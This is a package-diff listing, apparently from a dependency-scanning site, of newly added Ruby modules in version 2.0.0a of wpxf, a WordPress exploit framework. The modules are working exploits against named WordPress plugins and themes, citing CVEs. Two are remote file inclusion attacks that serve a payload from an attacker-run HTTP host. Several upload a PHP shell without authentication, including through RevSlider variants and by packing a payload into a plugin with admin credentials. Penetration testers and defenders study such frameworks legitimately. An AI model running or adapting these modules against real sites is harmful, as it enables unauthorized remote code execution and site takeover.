RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb ADDED

@@ -0,0 +1,96 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  def initialize
+    super
+    update_info(
+      name: 'Gwolle Guestbook Remote File Inclusion',
+      desc: 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\
+            'allows for remote file inclusion and remote code execution. '\
+            'This exploit only works when the PHP option "allow_url_include" '\
+            'is enabled (disabled by default).',
+      author: [
+        'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
+        'rastating'                               # WPXF module
+      ],
+      references: [
+        ['CVE', '2015-8351'],
+        ['EDB', '38861']
+      ],
+      date: 'Nov 04 2015'
+    )
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'gwolle-gb')
+  end
+  def check
+    check_plugin_version_from_readme('gwolle-gb', '1.5.4')
+  end
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
+  end
+  def on_http_request(path, params, headers)
+    payload.encoded
+  end
+  def vulnerable_url
+    normalize_uri(plugin_url, 'frontend', 'captcha', 'ajaxresponse.php')
+  end
+  def run
+    return false unless super
+    start_http_server(true)
+    emit_info 'Executing request...'
+    res = execute_get_request(
+      url: vulnerable_url,
+      params: { 'abspath' => rfi_url }
+    )
+    stop_http_server
+    emit_info "Response code: #{res.code}", true
+    emit_info "Response body: #{res.body}", true
+    if res.body =~ /allow_url_include/
+      emit_error 'allow_url_include appears to be disabled'
+      return false
+    end
+    if res && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    true
+  end
+end

data/lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb ADDED

@@ -0,0 +1,90 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::WpMobileDetectorRfiShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'WP Mobile Detector RFI Shell Upload',
+      desc: 'The WP Mobile Detector plugin, in version 3.5, '\
+            'allows for remote file inclusion and remote code execution via '\
+            'the resize.php script. This exploit only works when the PHP '\
+            'option "allow_url_fopen" is enabled (disabled by default in most cases).',
+      author: [
+        'White Fir Design', # Vulnerability disclosure
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'],
+        ['WPVDB', '8505']
+      ],
+      date: 'May 31 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The external address of this machine',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'wp-mobile-detector')
+  end
+  def check
+    check_plugin_version_from_readme('wp-mobile-detector', '3.6', '3.5')
+  end
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
+  end
+  def on_http_request(path, params, headers)
+    payload.encoded
+  end
+  def uploader_url
+    normalize_uri(plugin_url, 'resize.php')
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('src', rfi_url)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(plugin_url, 'cache', payload_name)
+  end
+  def before_upload
+    start_http_server(true)
+    true
+  end
+  def cleanup
+    stop_http_server
+    super
+  end
+end

data/lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb ADDED

@@ -0,0 +1,71 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AccessPressAnonymousPostProShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'AccessPress Anonymous Post Pro < 3.2.0 Unauthenticated Shell Upload',
+      author: [
+        'Colette Chamberland', # Disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8977'],
+        ['CVE', '2017-16949']
+      ],
+      date: 'Dec 19 2017'
+    )
+  end
+  def check
+    :unknown
+  end
+  def before_upload
+    emit_info 'Acquiring upload nonce...'
+    res = execute_get_request(url: full_uri)
+    return false unless res&.code == 200
+    pattern = /var\sap_fileuploader\s=\s{.+?,"nonce":"([a-zA-Z0-9]+?)"};/i
+    self.upload_nonce = res.body[pattern, 1]
+    if upload_nonce.nil?
+      emit_error 'Failed to acquire upload nonce'
+      return false
+    else
+      emit_success "Acquired upload nonce: #{upload_nonce}", true
+      return true
+    end
+  end
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+  def upload_request_params
+    {
+      'action' => 'ap_file_upload_action',
+      'file_uploader_nonce' => upload_nonce,
+      'allowedExtensions[]' => 'php',
+      'sizeLimit' => '6400'
+    }
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('qqfile', payload.encoded, payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    return nil if upload_result&.body.nil?
+    res = JSON.parse(upload_result.body)
+    res['url']
+  end
+  attr_accessor :upload_nonce
+end

data/lib/wpxf/modules/exploit/shell/acf_frontend_display_shell_upload.rb ADDED

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AcfFrontendDisplayShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'ACF Frontend Display <= 2.0.5 Unauthenticated Shell Upload',
+      author: [
+        'TCYB3R',    # Discovery and disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8086'],
+        ['EDB', '37514']
+      ],
+      date: 'Jul 03 2015'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('acf-frontend-display', '2.0.6')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'acf-frontend-display', 'js', 'blueimp-jQuery-File-Upload-d45deb1', 'server', 'php', 'index.php')
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'upload')
+    builder.add_file_from_string('files', payload.encoded, payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, "uigen_#{Time.now.strftime('%Y')}", payload_name)
+  end
+end

data/lib/wpxf/modules/exploit/shell/adblock_blocker_shell_upload.rb ADDED

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AdblockBlockerShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Adblock Blocker Unauthenticated Shell Upload',
+      author: [
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8592'],
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/08/01/arbitrary-file-upload-vulnerability-in-adblock-blocker/']
+      ],
+      date: 'Aug 01 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('addblockblocker')
+  end
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'getcountryuser')
+    builder.add_file_from_string('popimg', payload.encoded, payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, Time.now.strftime('%Y'), Time.now.strftime('%m'), payload_name)
+  end
+end

data/lib/wpxf/modules/exploit/shell/admin_shell_upload.rb ADDED

@@ -0,0 +1,47 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AdminShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+  include Wpxf::WordPress::Login
+  include Wpxf::WordPress::Plugin
+  def initialize
+    super
+    update_info(
+      name: 'Admin Shell Upload',
+      desc: %(
+        This module will generate a plugin, pack the payload into it and
+        upload it to a server running WordPress; providing valid admin
+        credentials are used.
+      ),
+      author: [
+        'rastating'
+      ],
+      date: 'Feb 21 2015'
+    )
+  end
+  def check
+    return :vulnerable if wordpress_and_online?
+    :unknown
+  end
+  def requires_authentication
+    true
+  end
+  def run
+    return false unless super
+    emit_info 'Uploading payload...'
+    res = upload_payload_as_plugin_and_execute(
+      Utility::Text.rand_alpha(10),
+      Utility::Text.rand_alpha(10),
+      session_cookie
+    )
+    !res.nil?
+  end
+end

data/lib/wpxf/modules/exploit/shell/aries_revslider_shell_upload.rb ADDED

@@ -0,0 +1,17 @@
+# frozen_string_literal: true
+require_rel './revslider_shell_upload'
+class Wpxf::Exploit::AriesRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Aries Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Aries theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/avada_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AvadaRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Avada Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Avada theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/awake_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::AwakeRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Awake Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Awake theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/beach_apollo_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::BeachApolloRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Beach Apollo Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Beach Apollo theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end